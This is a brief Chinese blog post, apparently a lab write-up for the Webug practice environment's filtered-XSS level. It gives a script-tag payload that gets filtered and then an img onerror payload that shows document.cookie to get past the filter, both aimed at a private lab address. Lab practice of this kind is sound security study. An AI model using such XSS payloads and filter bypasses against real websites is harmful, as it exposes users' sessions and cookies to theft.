Webug——过滤xss

同反射型xss相同 在url 参数id中进行xss攻击

http://192.168.75.146/control/xss/filter_xss.php?id=<script>alert(xss)</script>

不过根据反馈 script被过滤了

我们就需要绕过 过滤函数

换一个标签

payload=http://192.168.75.146/control/xss/filter_xss.php?id=<img src=1 onerror=alert(document.cookie)>

posted @ 2023-03-30 16:18  周知行  阅读(32)  评论(0编辑  收藏  举报